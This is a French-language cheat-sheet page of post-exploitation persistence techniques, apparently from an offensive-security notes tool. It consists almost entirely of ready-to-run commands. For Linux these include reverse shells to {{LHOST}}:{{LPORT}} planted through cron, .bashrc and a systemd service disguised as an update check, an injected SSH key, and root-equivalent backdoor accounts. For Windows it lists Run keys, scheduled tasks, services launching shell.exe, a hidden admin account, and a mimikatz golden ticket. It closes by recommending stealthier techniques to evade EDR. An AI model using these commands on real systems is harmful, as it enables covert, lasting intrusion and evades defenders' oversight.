persistencebackdoorcron
MDstable
Persistance
Techniques de maintien d'accès post-exploitation
snippetadvanced 2025-05-10 2 min read
persistencebackdoorcronregistryauthorized-keys
Linux
Clé SSH autorisée
bash
Variables
{{USER}}
{{SSH_PUBLIC_KEY}}
{{TARGET}}
# Générer une paire de clés côté attaquantssh-keygen -t ed25519 -f /tmp/backdoor -N ""# Ajouter la clé publique sur la ciblemkdir -p /home/{{USER}}/.sshecho "{{SSH_PUBLIC_KEY}}" >> /home/{{USER}}/.ssh/authorized_keyschmod 600 /home/{{USER}}/.ssh/authorized_keys# Connexion persistantessh -i /tmp/backdoor {{USER}}{{TARGET}}
Cron job backdoor
bash
Variables
{{LHOST}}
{{LPORT}}
# Reverse shell toutes les 5 minutesecho "*/5 * * * * root bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1" >> /etc/crontab# Ou via crontab usercrontab -l 2>/dev/null; echo "*/5 * * * * bash -c 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1'" | crontab
Utilisateur backdoor
bash
Variables
{{BACKDOOR_USER}}
{{BACKDOOR_PASS}}
# Créer un utilisateur rootuseradd -o -u 0 -g 0 -s /bin/bash -d /root {{BACKDOOR_USER}}echo "{{BACKDOOR_USER}}:{{BACKDOOR_PASS}}" | chpasswd# Ajouter à sudoers sans mot de passeecho "{{BACKDOOR_USER}} ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
Modification /etc/passwd
bash
Variables
{{BACKDOOR_USER}}
{{BACKDOOR_PASS}}
# Ajouter un compte rootecho "{{BACKDOOR_USER}}:$(openssl passwd {{BACKDOOR_PASS}}):0:0::/root:/bin/bash" >> /etc/passwd
Bashrc / Profile
bash
Variables
{{LHOST}}
{{LPORT}}
# Dans ~/.bashrc ou ~/.profileecho "bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1" >> /.bashrc# Silencieux avec redirectionecho "nohup bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1 &" >> /.bashrc
Service systemd
bash
Variables
{{LHOST}}
{{LPORT}}
cat > /etc/systemd/system/update-check.service << 'EOF'UnitDescriptionSystem Update CheckServiceExecStart/bin/bash -c 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1'RestartalwaysRestartSec60InstallWantedBymulti-user.targetEOFsystemctl enable update-checksystemctl start update-check
Windows
Registry Run key
bash
# HKCU (user courant)reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Updater" /t REG_SZ /d "C:\Temp\shell.exe" /f# HKLM (tous les utilisateurs, nécessite admin)reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Updater" /t REG_SZ /d "C:\Temp\shell.exe" /f
Tâche planifiée
bash
# Toutes les heuresschtasks /create /tn "WindowsUpdate" /tr "C:\Temp\shell.exe" /sc hourly /ru System /f# Au démarrageschtasks /create /tn "StartupTask" /tr "C:\Temp\shell.exe" /sc onstart /ru System /f
Service Windows
bash
sc create "WindowsHelper" binpath "C:\Temp\shell.exe" start autosc start "WindowsHelper"
Comptes locaux
bash
Variables
{{BACKDOOR_USER}}
{{BACKDOOR_PASS}}
net user {{BACKDOOR_USER}} {{BACKDOOR_PASS}} /addnet localgroup administrators {{BACKDOOR_USER}} /add# Cacher de l'écran de loginreg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v {{BACKDOOR_USER}} /t REG_DWORD /d 0 /f
Golden Ticket (Active Directory)
bash
Variables
{{DOMAIN}}
{{DOMAIN_SID}}
{{KRBTGT_HASH}}
# Dans mimikatz, dump le hash KRBTGTlsadumpdcsync /userkrbtgt# Créer le golden ticketkerberosgolden /userAdministrator /domain{{DOMAIN}} /sid{{DOMAIN_SID}} /krbtgt{{KRBTGT_HASH}} /ticketgoldenkirbi# Utiliser le ticketkerberosptt goldenkirbi
🔴 Danger —
Les backdoors sont détectables par les EDR modernes. Préférer des techniques Living-off-the-land (LOLBins) pour rester discret.
OPS·BRAIN v1.075 notes · Securitylocal